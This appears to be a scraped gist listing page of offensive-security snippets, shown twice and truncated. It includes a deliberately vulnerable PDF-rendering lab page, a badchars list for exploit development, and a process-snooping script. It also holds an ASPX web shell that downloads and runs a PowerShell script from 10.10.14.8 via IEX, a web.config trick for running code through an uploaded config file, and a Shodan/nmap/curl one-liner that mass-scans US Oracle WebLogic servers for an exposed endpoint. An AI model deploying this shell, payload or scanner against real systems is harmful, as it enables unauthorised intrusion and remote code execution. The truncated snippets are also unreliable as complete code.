Splint3r7 Splint3r7

## ssrf_wkhtmltopdf.php
<?php

# Before starting this lab make sure wkhtmltopdf is installed.

header("Content-Type: text/html");

$bad = "script";

$param = $_GET["xss"];
echo "Printing your payload on pdf file sur ;_;</br>";

## read.php
<?php
$file = 'test.pdf';
$filename = 'test.pdf'; /* Note: Always use .pdf at the end. */

header('Content-type: application/pdf');
header('Content-Disposition: inline; filename="' . $filename . '"');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));
header('Accept-Ranges: bytes');

## badchars
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"

## cron.sh
#!/bin/bash

FS=$'\n'
old_pr=$(ps -eo command)
while true; do
        new_pr=$(ps -eo command)
        diff <(echo "$old_pr") <(echo "$new_pr") | grep [\<\>]
        sleep 1
        old_pr=$new_pr
done

## ruby-open-uri-request.rb
# http://ruby-doc.org/stdlib-2.0.0/libdoc/open-uri/rdoc/OpenURI.html
require 'open-uri'

# Go fetch the contents of a URL & store them as a String
response = open('http://www.example.com').read

# "Pretty prints" the result to look like a web page instead of one long string of HTML
URI.parse(response).class

# Print the contents of the website to the console

## web.aspx
//simple aspx shell to execute commands
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.8:1667/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

## web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />

## href-urls.sh
#!/bin/bash
echo "<title>Generated hyper Link URLS</title>" >> $1-urls.html
cat $1 | while read urls; do
        echo "<a href=${urls}>${urls}</a></br></br>" >> $1-urls.html
done

## content_discovery_all.txt
`
~/
~
×™×


___
__
_

## gist:21318469ccb629d972586ca1ab8c21ad
#!/bin/bash

# this script was written by viss as a challenge from @random_robbie
# This one-liner replaces a fairly lengthy python script
# if you want to be walked through it, sign up for square cash, send $viss 20 dollars. Otherwise, flex your google fu!
# oh, ps: you need to pip install shodan, and then configure the shodan cli client by giving it your api key.
# then you're off to the races.

shodan search --fields ip_str --limit 1000 'product:"Oracle Weblogic" port:"7001" country:"US"' | sort -u | nmap -sT -Pn -n -oG - -iL - -p 7001 | grep open | awk '{print $2}' | xargs -I % -n 1 -P 30 bash -c 'RESULT=`curl -s -I -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko0100101 Firefox/54.0" -H "Connection":"close" -H "Accept-Language":"en-US -H en;q=0.5" -H "Accept":"text/html -H application/xhtml+xml -H application/xml;q=0.9 -H */*;q=0.8" -H "Upgrade-Insecure-Requests":"1" %:7001/ws_utc/config.do | egrep HTTP`; echo "%: $RESULT";'
	<?php

	# Before starting this lab make sure wkhtmltopdf is installed.

	header("Content-Type: text/html");

	$bad = "script";

	$param = $_GET["xss"];
	echo "Printing your payload on pdf file sur ;_;</br>";
	<?php
	$file = 'test.pdf';
	$filename = 'test.pdf'; /* Note: Always use .pdf at the end. */

	header('Content-type: application/pdf');
	header('Content-Disposition: inline; filename="' . $filename . '"');
	header('Content-Transfer-Encoding: binary');
	header('Content-Length: ' . filesize($file));
	header('Accept-Ranges: bytes');
	badchars = (
	"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
	"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
	"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
	"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
	"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
	"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
	"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
	"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
	"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
	#!/bin/bash

	FS=$'\n'
	old_pr=$(ps -eo command)
	while true; do
	new_pr=$(ps -eo command)
	diff <(echo "$old_pr") <(echo "$new_pr") \| grep [\<\>]
	sleep 1
	old_pr=$new_pr
	done
	# http://ruby-doc.org/stdlib-2.0.0/libdoc/open-uri/rdoc/OpenURI.html
	require 'open-uri'

	# Go fetch the contents of a URL & store them as a String
	response = open('http://www.example.com').read

	# "Pretty prints" the result to look like a web page instead of one long string of HTML
	URI.parse(response).class

	# Print the contents of the website to the console
	//simple aspx shell to execute commands
	<%
	Set s = CreateObject("WScript.Shell")
	Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.8:1667/shell.ps1')")
	o = cmd.StdOut.Readall()
	Response.write(o)
	%>
	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
	<system.webServer>
	<handlers accessPolicy="Read, Script, Write">
	<add name="web_config" path=".config" verb="" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
	</handlers>
	<security>
	<requestFiltering>
	<fileExtensions>
	<remove fileExtension=".config" />
	#!/bin/bash
	echo "<title>Generated hyper Link URLS</title>" >> $1-urls.html
	cat $1 \| while read urls; do
	echo "<a href=${urls}>${urls}</a></br></br>" >> $1-urls.html
	done
	#!/bin/bash

	# this script was written by viss as a challenge from @random_robbie
	# This one-liner replaces a fairly lengthy python script
	# if you want to be walked through it, sign up for square cash, send $viss 20 dollars. Otherwise, flex your google fu!
	# oh, ps: you need to pip install shodan, and then configure the shodan cli client by giving it your api key.
	# then you're off to the races.

	shodan search --fields ip_str --limit 1000 'product:"Oracle Weblogic" port:"7001" country:"US"' \| sort -u \| nmap -sT -Pn -n -oG - -iL - -p 7001 \| grep open \| awk '{print $2}' \| xargs -I % -n 1 -P 30 bash -c 'RESULT=`curl -s -I -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko0100101 Firefox/54.0" -H "Connection":"close" -H "Accept-Language":"en-US -H en;q=0.5" -H "Accept":"text/html -H application/xhtml+xml -H application/xml;q=0.9 -H /;q=0.8" -H "Upgrade-Insecure-Requests":"1" %:7001/ws_utc/config.do \| egrep HTTP`; echo "%: $RESULT";'